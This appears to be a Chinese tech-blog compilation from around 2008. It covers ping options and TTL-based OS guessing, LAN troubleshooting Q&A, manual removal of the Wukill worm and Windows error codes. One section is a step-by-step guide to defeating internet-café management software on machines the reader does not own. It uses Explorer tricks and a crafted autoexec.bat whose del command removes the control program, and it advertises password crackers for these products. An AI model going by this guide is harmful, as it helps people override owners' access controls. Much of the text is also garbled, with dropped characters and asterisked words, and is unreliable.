Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 -
202.107.210.214 -
61.153.112.70 -
61.153.112.89 -
202.96.105.149 -
202.96.105.97 -
202.96.105.101 -
202.96.105.150 -
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% lo ),
A roximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。
-s count Timestamp for count ho .
指定 count 指定的跃点数的时间戳。
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。
-j host-list Loose source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。
-k host-list Strict source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。
-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔,单位为毫秒。
此参数没有什么其他技巧。
32)ping命令的其他技巧:
在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20
好了,ping命令也基本上完全讲解完了,其中还有-j,-k参数我还没有详细说明,由于某些原因也包括我自己所收集的资料过少这里也没有向大家详细介绍,请大家见谅,如果在看了这篇文章的朋友当中有知道得比我更多的,以及其他使用技巧的也希望您能告诉我,并在此先谢过。
局域网应用问题专题解答 (Rayi々)
1、问:我访问局域网中的计算机时,为什么常常被提示要输入用户名和密码?
答:这主要是为了安全方面的考虑。而且当你重新启动计算机时又要重新输入用户名和密码,这一点确实让人会觉得很麻烦。
你只要在需要进行文件共享的计算机上建立一个相同的用户名,并且使用相同的密码,然后局域网中的计算机都利用这个用户名和密码登录,这样在网上邻居中访问对方计算机时就不需要输入用户名和密码了。
2、问:上网浏览前在局域网中应如何对IE进行设置?
答:在局域网中使用代理服务器上网浏览时,应对浏览器进行必要的设置。以IE为例,在浏览器中代理服务器的设置方法为:用鼠标右击桌面上的IE图标,在弹出的右键菜单中选择“属性”命令。在打开的“Internet 属性”对话框中选择“连接”项,然后点击“局域网设置”,在“局域网(LAN)设置”对话框中选中“使用代理服务器”,并输入代理服务器的地址以及端口。
默认对于HTTP、FTP浏览器都是使用相同的代理服务器设置,如果对这些服务有不同的代理,你就需要进行其他的设置。
方法为:点击“高级”按钮,取消“对所有协议均使用相同的代理服务器”,并分别在不同的服务中输入各自的地址和端口,保存以上设置后,IE就可以使用代理服务器上网了。
3、问:在局域网中应如何设置OutLook Expre 收发邮件?
答:在局域网中OE等电子邮件收发软件同样可以通过代理服务器上网,只是不能再使用原来的单机拨号上网设置。而且相对于其他软件的代理服务器设置,邮件软件的服务器设置要更为特殊一点,其代理服务器的类型必须是Socks4或Socks5的服务器。假设所使用的代理服务器的地址为:202.102.49.141,用户的邮件地址为:
那么在OE中代理服务器的设置方法为:打开OE后,选择菜单“工具→账户”。在“Internet账户”中选择“邮件”选项卡,然后在账户列表中选择需要设置的账户,点击“属性”按钮。在属性窗口中选择“服务器”选项卡(图1),在接收和发送邮件服务器地址中输入代理服务器的地址(如202.102.49.141),并按“用户名#邮件真实的收信地址”的命名规则,在账户名中输入 “jjxm#POP3.163.com”,单击“确定”保存后即可在代理服务器中收发邮件了。
4、问:在由三台电脑组成的局域网中,我在其中一台电脑上用过Windows优化大师后,为什么这台电脑就不能登录网络,并且还提示找不到拨号适配器?
答:根据你说的情况,是没有***“拨号网络”。解决方法是:在“控制面板”的“添加/删除程序”中,选择“Windows***程序”,在“组件”的“通讯”中选择“拨号网络”,然后将Windows***盘放入光驱进行***,重新启动计算机后就可使用拨号网络了。
5、问:如何在局域网中设置QQ、ICQ等即时通讯软件?
答:在QQ的主窗口中点击“QQ2000”的按钮,在其主菜单中选择“系统参数”,在参数窗口中选择“网络设置”选项卡。首先在“上网类型”中选择“局域网接入Internet”,再选中“使用Socks5代理服务器”,然后输入服务器的地址以及端口(图2),如果代理服务器中设定了用户密码,还需要输入用户名和密码。输入完毕后可以点击“测试”按钮来检测其代理是否正常。最后单击“确定”即可在代理服务器中使用QQ了。
类似地,在ICQ中选择“连接”中的“防火墙”,可以定义多个代理服务器,如Socks4、Socks5、HTTPS等。你首先要确定并选择所使用的代理服务器类型,然后在“代理服务器”部分输入主机的地址、端口,如果代理服务器设置了用户密码,还必须输入用户名和密码。对于代理服务器的类型、地址、端口等,如果你不太清楚,可以询问网络管理员。
6、问:我想用NetMeeting进行局域网中的通话,应该如何设置?
答:如果你首次打开NetMeeting,软件会自动启动配置向导。在配置向导窗口点击“下一步”,然后输入你的基本信息(如姓名、E-mail等)。继续单击“下一步”,进入服务器配置窗口,NetMeeting允许启动时登录到目标服务器,这个功能是针对于普通上网用户的,局域网用户并不需要该功能,因此你必须取消该选项。继续单击“下一步”,选择网络速度,必须选择“局域网”,然后提示是否建立快捷方式,你可以根据需要进行选择。接下来进行音频调节测试后就完成了局域网中对NetMeeting的设置。
7、问:我知道在局域网内文件是可以共享的,但我想问的是,打印机和扫描仪应该如何共享?
答:先来说说打印机的共享方法。你可以先在局域网内找一台电脑,并把打印机连接到这台电脑上,然后按照说明书为打印机***好驱动程序。在Windows系统任务栏上,点击“开始→设置→控制面板”,在“控制面板”窗口中双击“打印机”图标,再用鼠标右键单击打印机图标,在弹出的右键菜单上选择“共享”,然后在打开的“打印机属性”窗口上选择“共享为”,并像共享文件那样给被共享的打印机也起一个共享名,然后点击“确定”即可。
关于扫描仪的共享设置,你首先要看一下你的扫描仪是否具有网络共享功能,是否配备了用于共享的驱动程序,也就是说只有部分扫描仪可以进行网络共享。另外不同型号扫描仪的共享设置差异很大,最好查阅一下扫描仪的说明书。
8、我用分机线上网,上网速度最大才48000 ,请问是何原因? 还有,将Modem放在主机箱侧面,开机后(未打开Modem电源),家里的***就处于忙音状态,如何解决?
答:第一个问题跟你的分机***线或线接头质量有很大关系,另外,如果你的Modem的速度平常都能接近48000 ,你也不要太在意,应该重点先看下它的实际下载速度是否令你满意。第二个问题,肯定和你主机的电源等配件的电磁辐射强和屏蔽效果差有关,你如果不想对你的主机进行大换血的话,最好用物体在主机和Modem之间进行屏蔽,或将Modem离你的主机远点,这是最好的办法。
9、我新购的网卡在电脑上无法***,而在其他电脑上却使用正常,这是怎么回事?
答:如果在电脑中***好网卡后,系统没有提示找到新硬件,你可运行“添加新硬件向导”来让系统搜索新硬件。方法是单击“开始”,指向“设置”,单击“控制面板”,然后再双击“添加新硬件”。按照屏幕提示操作。你可选“让Windows搜索新硬件吗?”,单击“是(推荐)”,然后再单击“下一步”,让系统找到网卡再***其驱动。
而如果出现以下任何现象,网卡或者网卡所在的插槽损坏:
1、“添加新硬件向导”检测不到网卡;
2、“添加新硬件向导”能够检测到网卡,但无法正常工作。
为了确定到底是网卡还是插槽的问题,可以检查网卡是否牢靠插入插槽之中。如果网卡已牢靠插入插槽之中,请改插到其他插槽之中试试。如果问题仍未解决,则可能是网卡损坏或与你的电脑不兼容,可更换之。
10、我的电脑出现“网上邻居”中找不到其他联网电脑的故障,如何解决?
答:“网上邻居”是按工作组显示计算机的。如果你的电脑没有设置工作组名称,打开“网上邻居”时就可能看不到其他电脑。单击“开始”,指向“设置”,单击“控制面板”,双击“网络”,然后再单击“标识”选项卡。你局域网中所有电脑“工作组”框中的名称应为一样,如有不同你可在此框中键入相同的工作组名称,然后单击“确定”重启电脑既可。
此外,如果“网上邻居”中不出现“整个网络”图标,可能是在Windows中没有***必要的网络组件。要与网络上的其他计算机连接,则必须***以下组件:Microsoft网络客户、网络适配器、至少一种网络协议(如IPX/SPX、TCP/IP等)。可打开“网络”,检查“配置”选项卡上的列表,确保已***了各种必要的网络组件。如有,你可重新***各种缺少的组件即可。
11、问:公司局域网,只有一台机器通过猫接入互联网,现想其他机器接入互联网,请问如何实现?
答:这是一个比较典型的代理上网问题。你可以在带猫的机器上***代理上网软件(如Sygate、Wingate、Wi roxy)或直接使用Windows自带的共享上网功能上网(Windows 98第二版以上才带此功能)。建议使用Sygate,该软件设置较简单。先拨号上网,后***Sygate,完毕后,Sygate将检测互联网的连接状态,并自动设置。在其他需要代理上网的机器上,指定网关和DNS的 IP地址,步骤为网上邻居→右键→属性→TCP/IP协议→属性→DNS,输入当地ISP的IP地址→网关,输入代理服务器的IP地址→确定→重启。设置完毕后,其他各项应用软件均无须设置。
12、问:局域网通过路由器、使用ADSL方式上网,如何使各工作站快速的获得可以上网的IP地址而不手工去指定?
答:假如使用Windows 2000,可以直接使用Windows 2000自带的dhcp功能,首先建立一个作用域,然后为这个作用域添加DNS的搜索顺序和路由器的IP地址,DNS搜索顺序为当地ISP的IP地址,路由器的IP地址即设置成当前局域网的路由器IP地址,其他机器则不指定IP地址,如非使用Windows 2000,则可使用第三方的dhcp软件,比如代理软件sygate和wingate都带有dhcp功能。
13、问:公司要组建局域网,需要用到邮件服务器和WWW服务器,请问这两种服务放到一台电脑里还是分别用两台电脑?都用什么软件?谢谢!
答:这两种服务现在用的皆比较广泛,可以只用一台计算机或用两台都可以,当然具体根据贵单位的预算开支和流量来决定。假如流量不大的话,建议只使用一台机器即可。至于软件方面,可以使用Windows 2000作服务器平台,然后使用Imail或Easymail作为邮件服务软件,www服务建议使用apache serve软件,因为Windows 2000自带的IIS存在许多漏洞,而且不***,在建立www服务器后,需考虑支持的语言脚本,现在用的比较广的是ASP和PHP,当然,具体使用哪种语言,很简单,看你自己精通哪方面就使用哪方面的,还有一点你没提供到的,就是很有必要建立一个ftp服务,你可使用u-ftp软件,这款软件在***和使用方面都不难。
14、问:家里原先有一台PII的计算机,最近又新增一台P4机器,操作系统都为Windows 98且已***网卡,现在我想把他们联起来共享资源,该怎么办?
答:你所提的实际上即现在应用的比较广泛的对等网的连接。很简单,因你已有网卡,你需做的使是购买适合长度的超五类线和2个RJ45的水晶头,再去借一把打线钳。然后再根据标准做一对跳线,即一头采用T568A标准(具体线的排列是:白绿、绿、白橙、蓝、白蓝、橙、白棕、棕),另一头采用T568B标准(白橙、橙、白绿、蓝、白蓝、绿、白棕、棕)。然后在操作系统中添加TCP/IP协议和Netbuei协议,把工作组设置为workgroup,计算机不能相同。
15、问:办公室机器桌面的“网上邻居”图标没了,能上Internet,但无法浏览其他机器上的资源了,怎么办?
答:说明你的Internet属性完好,但网上邻居属性中的“Microsoft 网络用户”这一客户组件没了。
进到“控制面板”中双击“网络”,先在弹出的网络对话框中点按“添加”按钮,再从随后弹出的“请选择网络组件类型”对话框中双击“客户”,最后从随后的“选择网络客户机”对话框的左侧选择“Microsoft”后再选择“Microsoft 网络用户”,“确定”再“确定”并据提示重启计算机就ok啦!先回去解决这个问题吧你……
16、问:办公室机器桌面的网上邻居图标解决了且也能浏览其他机器的共享资源了,但发现右键中的“共享”命令没了!怎么办?
答:这是因为还缺少个“Microsoft网络上的文件与打印机共享”这一网络服务协议呢!
先右击桌面“网上邻居”选“属性”,对话框中点按“添加”按钮,再从随后弹出的“请选择要***的网络组件”对话框中双击“服务”,最后从随后的“选择网络服务”对话框中选择“Microsoft网络上的文件与打印机共享”,“确定”再“确定”并据提示重启计算机就ok啦!
17、问:右键中的“共享”命令已经显身!但我设了共享不想让别人从网上邻居中看到这个共享目录,只有自己知道且能实现异地机上有完全操作的权限。
答:找到你想要共享的文件夹并右键点选“共享…”----这里我就以共享“D:\Windows 98”为例,先选中“共享为”后在共享名“Windows 98(当然也可改名共享哦)”后加一英文状态的“$”符,再选中“完全”并输入设定好“密码”,然后“确定”一次密码就OK了。
这样一来,绝对保证别人从网上邻居中看不到这个共享目录的!那~~自己想从异地机上进入并实现完全操作时怎么办呢?呵呵,这么办:从异地机的地址栏中键入“\\(机器名)\$(你的共享目录名)”并“ENTER”,再输入密码并确定后,就进入啦!这样你可静悄悄地实现异地机上在自己设定的共享目录内进行完全操作啦!不过注意其中“\”不能误输入成“/”哦!……好了,你会了吗?
18、问:一块PCI总线的10/100自适应网卡,无法正常工作。主要表现在网络时断时续,不管是不是Ping自己的IP地址,还是Ping对方的IP地址,都有这种情况发生。查看网卡的指示灯也出现同样的现象。
答:首先你可检查Hub的连接口是不是出了故障,将该网卡接到其他端口上,如果问题依然如故,说明Hub没有问题。然后你可用网卡随盘附带的测试程序盘查看网卡的有关参数,其IRQ值为5,再回到Windows 95/98操作系统,查看操作系统分配给网卡的参数值,其IRQ同样应是5。此外,可检查***该网卡的主板插槽是否有故障,你可打开机箱,将网卡换个PCI插槽试试。此外,你还可检查CMOS参数设置,重新启动计算机,进入CMOS状态,选择“PNP/PCI Configuration”一项,如果IRQ5后面的状态为“Legacy ISA”(保留的ISA总线设备),就应当将IRQ5后面的状态改为“PCI/ISA PNP”。
19、问:我的电脑与一个对等网连接好了,但不能读别人电脑上的数据,这是怎么回事?
答:可能是你没有设置好资源共享:选择“网络→配置→文件及打印共享”,将两个选项全部打勾并确定,***成功的标志是配置中出现了“Microsoft网络上的文件与打印机共享”选项,注意,还要检查它与NetBEUI协议是否进行了绑定。选择“配置”中的NetBEUI协议,点击“属性”按钮,看绑定中“Microsoft网络上的文件与打印机共享”、“Microsoft网络用户”前是否已经有对勾了。还要在“网络→标识”里将“计算机名”设置好,确定之后系统将重新启动。
20、问:我的网络从集线器升级为交换机后,感觉速度并没有多大提高,是什么原因?
答:这种情况需要从以下几个方面来分析:
1、首先应确认网络是否工作在100M状态,具体做法是:确认网线是五类以上线,网线做法遵循100M标准,网卡支持100M工作状态,只有满足以上条件,交换机才能工作于100M状态,从而最大限度地体现交换机的性能优势。
2、如果网络在升级前工作正常,数据交换量不是很大,数据冲突和广播风暴现象出现的不是很频繁,那么升级后网络性能的提升可能不是很明显,这是正常现象。
3、还有一种情况是因为网络结构设置不当引起的,例如,如果把集线器放在第一级连接服务器,而把交换机放在下一级来连接工作站,这样数据交换仍然通过集线器进行,交换机的性能优势没有体现出来。所以,在组网时应当充分考虑网络结构的合理性,应将性能较好的设备置于整个网络的最高级。
21、问:VLAN是什么意思,使用它有什么好处?
答:VLAN是Virtual Local Area Network的缩写,即虚拟局域网的意思。VLAN的划分有三种方式:基于端口(Port)、基于MAC地址和基于IP地址。通过划分VLAN,可以把数据交换限制在各个虚拟网的范围内,从而减少整个网络范围内广播包的传输,提高了网络的传输效率;同时各虚拟网之间不能直接进行通讯,而必须通过路由器转发,起到了隔离端口的作用,为高级安全控制提供了可能,增强了网络的安全性。VLAN功能的适用性很广,在数据交换较频繁或对网络安全性有要求的环境均可适用,如:1、在智能小区、校园、企业等应用环境,使用VLAN功能可使不同VLAN间的机器不能互相访问,可为网络安全控制提供良好保障;2、在游戏厅、大中型企业等环境,使用VLAN可大大减少网络中不必要的数据交换的数量,杜绝广播风暴,提升网络传输性能。
22、问:我的自适应网卡只有红灯闪烁,绿灯不亮,这种情况正常吗?
答:首先你应该了解一般自适应网卡红灯和绿灯分别代表什么含义——红灯代表Link/Act(连通/工作),即连通时红灯长亮,传输数据时闪烁;绿灯代表FDX(全双工),即全双工状态时亮,半双工状态时灭。如果一个半双工的网络设备(如Hub)和自适应网卡相连,由于这张网卡是自适应网卡,它也会工作在半双工状态,所以绿灯不亮也属于正常情况。
23、问:如何使用交换机的UpLink端口,怎样连接?使用了UpLink口后,是否还可以使用其相邻最近的端口?
答:UpLink口是交换机上常见的一种端口,它是为了便于两台交换机之间进行级联的端口。它与其相邻的普通UTP口使用的是同一通道,因而,如果使用了UpLink口,另一个与之相邻的普通端口就不能再使用了。这两个端口称为共享端口,不能同时使用。级联的时候,你可使用一般的网线(网线的两端都遵循同一标准,即同是EIA/TIA 568A或568B)将一个交换机的普通端口和另一个交换机的UpLink口连起来。如两个设备都使用UpLink口连接,网线需要一端使用EIA/TIA 568A的标准,另一端使用EIA/TIA 568B的标准(如下表)。
标准568a 标准568b
橙白1 绿白1
橙2 绿2
绿白 3 橙白3
蓝4 蓝4
蓝白5 蓝白5
绿6 橙6
棕白7 棕白7
棕8 棕8
24、问:我在***网卡后,在“系统→设备管理器”中网卡出现***的“!”号,请问该如何解决?
答:网卡较容易与其他设备发生资源冲突,尤其是在系统中***有多个插卡的情况下,解决办法是:
1、更换网卡在主板插槽上的位置是最好的解决办法。
2、在该网卡“属性”窗口“资源”标签中找到“资源类型”列表,选定发生冲突的“资源”,按“更改设置”按钮,更改发生冲突的IRQ中断号或者I/O地址。
3、有些PCI网卡会强行占用IRQ10,与一些强行占用IRQ10的显示卡发生IRQ中断冲突,如果遇到这种情况,可在BIOS中将“A ign IRQ For VGA”项设置为Disabled,不给显示卡分配固定的中断。
4、运行网卡附带的软盘中的设置程序,将网卡设置为非PNP模式,设置IRQ中断号和I/O地址为系统未占用的地址;并在BIOS中将相应中断号由PCI/ISA改为Legacy ISA。
如果使用上述方法均不能解决故障,建议换一块网卡试试。
25.问:ADSL上网网页打不开的问题?
答:是MTU的问题!改一下注册表!
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Cla \NetTra \0000\主键下面建立字符串键名为MaxMTU,键值为1450
查杀I-Worm.Wukill病毒(注意有变种了)的手工方法 (微笑)
我是用手工杀的。金山毒霸好象还不行,跟本就不报警。
首先用进程管理工具(如“优化大师”带的进程管理工具)把可疑的进程杀掉,再搜索最大不超过87KB的“*.EXE”文件,瑞星上说的自启动“MSTRAY.EXE”文件不对,它好象有了新的变种,自启动的文件名可以变换,而且有时每次重启动都会变,也不一定在WINDOWS哪个目录下,所以要查整个不超过87KB大小的.EXE文件,然后将所有图标为文件夹样式的.EXE文件删掉。同时对照注册表里的RUN项,查找不正常的启动项(建议也用优化大师,这样好判别,毒霸的也可以),除删掉启动项外,还要再查找一次不正常启动项对应的程序,并删掉。注意:这步操作十分危险,建议由有经验的人员操作。
接着再分别查找comment.htt 和desktop.ini,把它们都删掉。注意不要把“*:\My Documents”下的这两个文件删了,一般这里的都是正常文件(我自己用的笨办法就是用记事本打开,看看里面是不是MICROSOFT的东东)。
最后重启就OK了。
瑞星的在2月份就可以杀了,毒霸好象到现在都不行,是它的破坏力太小所以毒霸不屑一顾?????!!!!!!!!
刚又看了看前人的贴,发现这个家伙变种变的还是蛮快的。其中最大的变化就是自启动项的变化,这个病毒我遇到的最厉害的是在内存中同时有不同文件名的3个进程,并且自启动项的名称也不断变化,但WINFILE.EXE这个文件始终存在,而且一般是在根目录下,并陪随comment.htt 和desktop.ini这两个文件,可能这可以算为标志性文件之一了。在其它的目录下,则会根据你实际存在的目录名而更换自己的名称(呵,呵,这一点我比较佩服),不过无论它怎么换名,文件大小大都是约在85KB左右(具体字节我没有记录)。
建议怀疑自己中毒时,把“隐藏已知文件类型的扩展名”这个选项去掉,如果有文件夹图标的.EXE文件,那么恭喜你---------------中毒了!!!!!
另:正常的WINFILE.EXE文件大小为151419字节,且图标为一个文件柜样式。
在网上看到了一篇贴子。I-Worm.Wukill
破坏方法:这个病毒采用文件夹图标,具有很大迷惑性。该病毒运行后,会将自己大量复制到其他目录中。
一、 病毒首次运行时将显示"This File Has Been Damage!";
二、 将自己复制到windows目录下并改名为Mstray.exe;
三、 修改注册表:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
以达到其自启动的目的;
四、 枚举磁盘目录,在每个根目录下释放下列文件:
winfile.exe 病毒主体程序
coment.htt 利用IE漏洞调用同一个目录下的"winfile.exe",属性为隐藏。
desktop.ini 系统为隐藏。采用web方式浏览文件夹时,系统会调用该文件,该文件调用coment.htt ,从而激活病毒。
五、 病毒修改注册表,隐藏系统文件、隐藏受系统保护的文件、隐藏已知的扩展名称。
这样,用户看不到coment.htt和desktop.ini, winfile.exe被隐藏后缀明,又是文件夹图标,用户极容易认为是文件夹而点击。
同时病毒在当前路径下生成的自身拷贝,名称采用上级目录,或者是当前窗口的标题,增加隐蔽性
( Tue, 23 Sep 2008 22:11:42 +0800 )
Description: 美萍安全卫士系统设置解锁器v0.1(可以对付ver:8.55) 万象幻境普及版密码破解器v0.1
美萍安全卫士密码破解器v0.5 (直接看见ver:8.1的密码!) 方竹网吧管理器密码破解器v0.1
怎么知道正在使用的电脑有没有***管理软件呢,很简单,只要看看桌面上有没有“我的电脑”图标就可以了。没有的一定就是***了,如果有,而且你双击就可以进入,恭喜你,你可以跳过本文了(你要看我当然也不会拦你)。我在网吧遇到的管理软件比较多的就是万象幻境和美萍。其他的应该也有一些。但是破解方法都是大同小异的。我所谓破解,只是利用window操作系统的开放性,想办法在管理软件启动之前把它杀死。下面有很多种方法,分别是由难到易。有的朋友要问了,既然有简单的方法为什么还要用那难的呢?呵呵,随心打字很慢的,当然不会无聊的敲进那么多废话。原因就多了,主要有以下几点:1、软件使用过程中网管的设置不同。有的设置给用户较多的权限,我们破解起来,自然就容易一点。2、软件的种类和版本不同,虽然我前面说大同,但是还有小异呀。^_^3、注册版和试用版的不同,软件作者是舍不得给未注册版所有功能的,所以注册版自然就复杂一点。
呵呵,说了这么多,也没有稿费。累死了,等我喝口水先。(TMD,昨天的茶似乎变味了。背)
OKOK,让我们来说正事吧。(嘿嘿插播广告先,欢迎来访:freehe.126.com)
首先我们要明白,管理软件是在系统启动的时候自动加载的,然后它才可以通过修改注册表等各种方法限制我们对这台机器的操作。知道这个就好,只要让它不要自动启动不就行了么(废话)?我们要利用一个小程序:msconfig.exe。这个程序可不用下载,它是windows98(me) 自带的.注意,nt和2000可没有这东东,不过我想网吧里不会用nt和2000的^v^。顺便说一下。windowsXP也自带了这个程序。如果你自己有电脑,或者可以找到一台没有***任何管理软件的电脑,我们可以试着运行一下这个软件。关于运行这个文件,又有三个方法(你是老鸟的话可千万不要骂我,我见过许多网吧上网朋友的水平,不这么说,我真的怕他们听不懂):1、点击桌面左下脚的开始,选运行。在弹出窗口中键盘输入msconfig,回车。2、开始/程序/附件/系统工具/系统信息。选择“工具”菜单下的“系统配置实用程序”。3、双击“我的电脑”,这个程序在windows文件夹下的system文件夹中(你可能要点击一下窗口左边的“显示文件”才能看见文件夹),慢慢找,你会找到的。
如果你在一台***有网吧管理软件的机器上可以用以上三种方法中的任何一种运行这个程序,那么你离成功已经不远了。运行后你可以看见这个程序的主窗口,点击“启动”标签。除了SystemTray和internat.exe以外,把所有程序前的勾都去掉(这么做可以加快你的机器的速度)。然后重新启动(你要是连怎么重新启动都不会的话,我也没有办法了,tip:如果是mm就写信去问杨不悔吧,他会回答你的)。你现在就可以把这台机器想怎么就怎么了。不要搞破坏哦。
知道原理了,那么我们面临的难题就是怎么运行这个程序了。就让我们一种一种方法来试:
a、在地址栏(就是那个输入网址的地方)输入:“c:”然后回车,如果可以看见c盘下的内容,就用上面说的第三种方法启动msconfig。
b、打开一个ie浏览器窗口。点击收藏,把弹出菜单中的“链接”前的小文件夹图标用鼠标拖动到浏览器主窗口中松开,然后在点击“向上”(就是浏览器第三行“后退”、“前进”按钮后的那个按钮)三次,就可以进入c盘。同样用上面介绍的方法运行msconfig。
BTW,双击C盘根目录下的“COMMAND”文件,就可以进入dos方式(特指windows98),熟悉dos的朋友可以干活啦。这里不做重点介绍(象我一样喜欢dos的人不多了哦)。
c、大家都有信箱吧。到自己的信箱里写一封信。内容随意。然后点击附件,把这个程序(msconfig.exe)作为附件加到信里(不会我以后再专门写怎么用附件,呵呵,又是入门教程),再保存为草稿。选中这封信,点击附件。在弹出窗口中选择在当前位置运行该程序。
还有其他方法:
A、在启动时,按键盘上的“F8”(不知道什么时候按,那么你就在开机器的时候一直按),如果出现启动菜单。就选择:“安全模式”,成功进入的话,你就可以用任何一种方法运行msconfig了。------这种方法不要有太大的期望值。
B、如果你很熟悉windows的启动过程,那么你可以在刚刚进入windows的时候按下Ctrl+Alt+Del(一定要快,慢了这三个键就被屏蔽了),结束所有win启动过程中不需要的东东,如果一次看不见,就先取消,再按,……这么重复。直到win完全启动好。----这种方法最简单,而且不用重启(我就是经常这么做^v^),但是你必须熟悉win启动时候运行的每个程序。还要掌握好节奏。快了就会使系统重启,慢了无法看见网管软件的启动,当然也就无法结束。(如果朋友们要具体的,我可以在有空时专门说这个问题)
如果你不是很背的话,上边的方法就足够了。不过最近几个月,我在网吧碰到最新版的美萍安全卫士,不知道他用了什么方法,居然在我每次运行msconfig的时候可以自动关闭它(其实我也很菜的,欢迎高手教我呀)。琢磨了一下,试了老半天(55555……可怜随心的网费),也搞定了。方法如下:
用上边说的b方法进入c盘,删掉autoexec.bat,记住,你不可以用右键或者键盘上的“Delete”键来删除。
但是可以先选中这个文件,然后用窗口上方第二行“文件”下拉菜单中的“删除”。然后再选“文件”菜单中的“新建”--“文本文件”,双击这个新建的文件打开。在里面打上“del c:\smenu\smemu.exe"(记得先把这个文件copy到其他地方作个备分,我们用完了还要帮人家copy回来呀,毕竟人家网管也要混饭吃嘛)。选择“文件”菜单下的“另存为……”,在文件名里打上“autoexec.bat”,在保存类型里选择“所有文件(*.*)”,点击保存,重新启动即可搞定。autoexec.bat点击下载
好了,终于敲完了,累死我了。
如果以上方法还是不行,那么请来信(mail:crackboy@eyou.com)或者在留言本给我留话,说明一下具体情况,我可以再试试。
最近,看到不少关于破解网吧管理软件的文章,可是高手写的哦,给大家参考一下吧。
1、两分钟破解万象幻境 (利用其他常用软件造成漏洞)
2、步步深入破解美萍 (利用win系统漏洞)
3、美萍7_5+IE插件的攻防 (也是利用其他常用软件造成漏洞)
4、漏洞百出——针对美萍之LEVEL UP篇 (注册表修改法)
5、万象幻境网吧管理软件破解 (如果权限限制的不多,可以用)
有了这些好东东,不怕你基础差,只要你愿意稍微研究一下,我想没有任何一台装了“瘟98”的机器可以挡住你的去路了,现在,我们就可以为所欲为了!
( Tue, 23 Sep 2008 10:35:56 +0800 )
Description:
使用windows出现蓝色屏幕是经常的事,而且每每因为不清楚错误的来源而频繁重新***系统,劳神费时。下列收集了一些windows死机密码,供大家参考。
0 0x0000 作业完成。
1 0x0001 不正确的函数。
2 0x0002 系统找不到指定的档案。
3 0x0003 系统找不到指定的路径。
4 0x0004 系统无法开启档案。
5 0x0005 拒绝存取。
6 0x0006 无效的代码。
7 0x0007 储存体控制区块已毁。
8 0x0008 储存体空间不足,无法处理这个指令。
9 0x0009 储存体控制区块位址无效。
10 0x000a 环境不正确。
11 0x000b 尝试载入一个格式错误的程式。
12 0x000c 存取码错误。
13 0x000d 资料错误。
14 0x000e 储存体空间不够,无法完成这项作业。
15 0x000f 系统找不到指定的磁碟机。
16 0x0010 无法移除目录。
17 0x0011 系统无法将档案移到 其他的磁碟机。
18 0x0012 没有任何档案。
19 0x0013 储存媒体为防写状态。
20 0x0014 系统找不到指定的装置。
21 0x0015 装置尚未就绪。
22 0x0016 装置无法识别指令。
23 0x0017 资料错误 (cyclic redundancy check)
24 0x0018 程式发出一个长 度错误的指令。
25 0x0019 磁碟机在磁碟找不到持定的磁区或磁轨。
26 0x001a 指定的磁碟或磁片无法存取。
27 0x001b 磁碟机找不到要求的磁区。
28 0x001c 印表机没有纸。
29 0x001d 系统无法将资料写入指定的磁碟机。
30 0x001e 系统无法读取指定的装置。
31 0x001f 连接到系统的某个装置没有作用。
32 0x0020 the proce ca ot acce the file because it is being used by another proce .
33 0x0021 档案的一部份被锁定,现在无法存取。
34 0x0022 磁碟机的磁片不正确。 请将 %2 (volume serial number: %3) 插入磁碟机 %1。
36 0x0024 开启的分享档案数量太多。
38 0x0026 到达档案结尾。
39 0x0027 磁碟已满。
50 0x0032 不支援这种网路要求。
51 0x0033 远端电脑无法使用。
52 0x0034 网路名称重复。
53 0x0035 网路路径找不到。
54 0x0036 网路忙碌中。
55 0x0037 the ecified network resource or device is no longer available.
56 0x0038 the network bios command limit has been reached.
57 0x0039 网路配接卡发生问题。
58 0x003a 指定的伺服器无法执行要求的作业。
59 0x003b 网路发生意外错误。
60 0x003c 远端配接卡不相容。
61 0x003d 印表机伫列已满。
62 0x003e 伺服器的空间无法储存等候列印的档案。
63 0x003f 等候列印的档案已经删除。
64 0x0040 指定的网路名称无法使用。
65 0x0041 拒绝存取网路。
66 0x0042 网路资源类型错误。
67 0x0043 网路名称找不到。
68 0x0044 超过区域电脑网路配接卡的名称限制。
69 0x0045 超过网路 bios 作业阶段的限制。
70 0x0046 远端伺服器已经暂停或者正在起始中。
71 0x0047 由于连线数目已达上限,此时无法再连线到这台远端电脑。
72 0x0048 指定的印表机或磁碟装置已经暂停作用。
80 0x0050 档案已经存在。
82 0x0052 无法建立目录或档案。
83 0x0053 int 24 失败
84 0x0054 处理这项要求的储存体无法使用。
85 0x0055 近端装置名称已经在使用中。
86 0x0056 指定的网路密码错误。
87 0x0057 参数错误。
88 0x0058 网路发生资料写入错误。
89 0x0059 此时系统无法执行其他行程。
100 0x0064 无法建立其他的系统 semaphore。
101 0x0065 属于其他行程专用的 semaphore 。
102 0x0066 semaphore 已经设定,而且无法关闭。
103 0x0067 无法指定 semaphore 。
104 0x0068 在岔断时间无法要求专用的 semaphore 。
105 0x0069 此 semaphore 先前的拥有权已经结束。
106 0x006a 请将磁片插入 %1。
107 0x006b 因为代用的磁片尚未插入,所以程式已经停止。
108 0x006c 磁碟正在使用中或被锁定。
109 0x006d pipe 已经中止。
110 0x006e 系统无法开启指定的 装置或档案。
111 0x006f 档名太长。
112 0x0070 磁碟空间不足。
